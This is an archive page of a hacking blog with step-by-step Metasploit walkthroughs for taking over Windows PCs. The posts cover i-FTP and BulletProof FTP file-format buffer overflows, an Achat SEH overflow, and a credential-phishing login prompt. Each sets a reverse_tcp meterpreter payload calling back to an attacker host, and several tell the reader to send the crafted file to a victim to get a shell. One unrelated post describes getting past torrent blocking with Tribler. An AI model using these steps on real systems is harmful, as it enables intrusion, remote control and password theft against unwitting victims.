Friday 6 March 2015


Hack Remote Windows PC using i-FTP Schedule Buffer Overflow

 

This module exploits stack-based buffer overflow vulnerability in i-Ftp v2.20, caused by a long time value set for scheduled download. By persuading the victim to place a specially-crafted Schedule.xml file in the i-FTP folder, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3.

Exploit Targets

i-Ftp v2.20

Requirement

Attacker: kali Linux
Victim PC: Windows XP 3
Open Kali terminal type msfconsole
Now type use exploit/windows/fileformat/iftp_schedule_bof
msf exploit (iftp_schedule_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (iftp_schedule_bof)>set lhost 192.168.0.107 (IP of Local Host)
msf exploit (iftp_schedule_bof)>exploit

After we successfully generate the malicious xml File, it will stored on your local computer
/root/.msf4/local/schedule.xml

Copy Schedule.xml to C:\Program Files\Memecode\i.Ftp
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
exploit
Now send your schedule.xml files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
Posted by at No comments:

Hack Remote Windows PC using BulletProof FTP Client BPS Buffer Overflow

This module exploits stack-based buffer overflow vulnerability in BulletProof FTP Client 2010, caused by an overly long hostname. By persuading the victim to open a specially-crafted .BPS file, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3.

Exploit Targets

BulletProof FTP Client 2010

Requirement

Attacker: kali Linux
Victim PC: Windows XP 3
Open Kali terminal type msfconsole
Now type use exploit/windows/fileformat/bpftp_client_bps_bof
msf exploit (bpftp_client_bps_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (bpftp_client_bps_bof)>set lhost 192.168.0.107 (IP of Local Host)
msf exploit (bpftp_client_bps_bof)>exploit

After we successfully generate the malicious bps File, it will stored on your local computer
/root/.msf4/local/msf.bps
Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.107
exploit
Now send your msf.bps files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.
Posted by at No comments:

Hack Remote Windows PC using Achat Unicode SEH Buffer Overflow 

This module exploits a Unicode SEH buffer overflow in Achat. By sending a crafted message to the default port 9256/UDP, it’s possible to overwrite the SEH handler. Even when the exploit is reliable, it depends on timing since there are two threads overflowing the stack in the same time. This module has been tested on Achat v0.150 running on Windows XP SP3 and Windows 7.

Exploit Targets

Achat v0.150

Requirement

Attacker: kali Linux
Victim PC: Windows XP SP 3
Open Kali terminal type msfconsole
Now type use exploit/windows/misc/achat_bof
msf exploit (achat_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (achat_bof)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (achat_bof)>set rhost 192.168.1.8 (IP of Remote Host)
msf exploit (achat_bof)>exploit

Posted by at No comments:

How to Download from Torrents when Torrent is Block in Your Network

Tribler is an open source anonymous peer-to-peer decentralized Bit Torrent client. Tribler is based on the Bit Torrent protocol and uses an overlay network for content searching, which makes the program operate independent of external websites and renders it immune to limiting external action, for example, government restraint. Due to this overlay network Tribler does not require an external website or indexing service to discover content. The user interface of Tribler is very basic and focused on ease of use, instead of diversity of features. Tribler is available for Linux, Windows, and OS X.
First Download Tribler from here and install in your pc
Now search your desired movies, software and etc. you want to download from torrent
Posted by at No comments:

Hack Remote Windows Password using Phishing Login Prompt Exploit

Hack Remote Windows Password using Phishing Login Prompt Exploit

This module is able to perform a phishing attack on the target by popping up a loginprompt. When the user fills credentials in the loginprompt, the credentials will be sent to the attacker. The module is able to monitor for new processes and popup a loginprompt when a specific process is starting. Tested on Windows 7.

Exploit Targets

Windows 7

Requirement

Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
Now type use post/windows/gather/phish_windows_credentials
msf exploit (phish_windows_credentials)>set payload windows/meterpreter/reverse_tcp
msf exploit (phish_windows_credentials)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (phish_windows_credentials)>set session 1
msf exploit (phish_windows_credentials)>exploit 

Posted by at No comments:
Subscribe to: Posts (Atom)